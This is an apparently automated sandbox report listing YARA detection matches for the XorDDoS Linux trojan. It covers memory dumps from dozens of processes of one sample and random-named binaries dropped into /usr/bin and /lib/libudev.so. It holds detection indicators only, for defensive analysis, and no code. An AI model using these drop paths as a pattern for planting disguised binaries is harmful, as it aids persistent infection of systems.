              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9821, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9832, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9843, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9854, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9865, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9876, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9887, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9898, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9909, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9920, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9931, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9942, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9953, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9964, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9975, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9999, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10010, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10021, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10032, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10043, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10054, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10065, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10076, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10087, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10098, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10109, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10120, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10131, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10142, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10153, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10164, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10175, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10186, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10197, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10208, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10219, type: MEMORYSTR
              Source: Yara matchFile source: /usr/bin/zetazkptwu, type: DROPPED
              Source: Yara matchFile source: /usr/bin/tudlcvpgbc, type: DROPPED
              Source: Yara matchFile source: /usr/bin/qjfxtxsijs, type: DROPPED
              Source: Yara matchFile source: /lib/libudev.so, type: DROPPED
              Source: Yara matchFile source: /usr/bin/txflbjqefg, type: DROPPED
              Source: Yara matchFile source: /usr/bin/zyapsjpaje, type: DROPPED
              Source: Yara matchFile source: /usr/bin/wrfeamwlub, type: DROPPED
              Source: Yara matchFile source: /usr/bin/kmavqzvhro, type: DROPPED
              Source: Yara matchFile source: /usr/bin/whtzopaggc, type: DROPPED
              Source: Yara matchFile source: /usr/bin/wyyhrifhaz, type: DROPPED
              Source: Yara matchFile source: /usr/bin/wgpgdetjwe, type: DROPPED
              Source: Yara matchFile source: /usr/bin/yfiimchuiz, type: DROPPED
              Source: Yara matchFile source: /usr/bin/qvilroogsz, type: DROPPED

              System Summary

              barindex
              Source: dkuidbsedp, type: SAMPLEMatched rule: Detects XORDDoS Author: ditekSHen
              Source: dkuidbsedp, type: SAMPLEMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: 10241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9656.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9689.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10153.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9999.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9644.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9568.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10032.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9821.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10197.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9623.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9678.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10428.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9799.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10120.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9733.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9964.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9777.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10098.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9909.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9612.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9854.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10043.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9920.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10010.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10186.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9887.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9700.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9755.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9711.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10142.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10054.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10373.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9975.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9810.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9865.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9988.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9942.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10065.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10219.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9579.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9722.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10076.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10175.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9601.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9590.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9788.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10109.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9843.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9766.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9953.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10021.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10087.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9931.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9667.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9744.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10164.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9898.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9634.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10252.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9832.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 10131.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 9876.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/zetazkptwu, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/tudlcvpgbc, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/tudlcvpgbc, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/qjfxtxsijs, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/qjfxtxsijs, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /lib/libudev.so, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /lib/libudev.so, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/kmavqzvhro, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/kmavqzvhro, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/zyapsjpaje, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/zyapsjpaje, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/txflbjqefg, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/txflbjqefg, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/whtzopaggc, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/whtzopaggc, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/wrfeamwlub, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/wrfeamwlub, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/wyyhrifhaz, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/wyyhrifhaz, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/wgpgdetjwe, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/wgpgdetjwe, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/yfiimchuiz, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/yfiimchuiz, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/qvilroogsz, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/qvilroogsz, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: dkuidbsedp, type: SAMPLEMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: dkuidbsedp, type: SAMPLEMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: 10241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9656.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9689.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10153.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9999.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9644.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9568.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10032.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9821.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10197.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9623.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9678.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10428.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9799.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10120.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9733.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9964.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9777.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10098.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9909.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9612.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9854.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10043.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9920.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10010.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10186.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9887.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9700.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9755.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9711.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10142.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10054.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10373.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9975.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9810.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9865.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9988.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9942.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10065.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10219.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9579.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9722.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10076.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10175.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9601.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9590.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
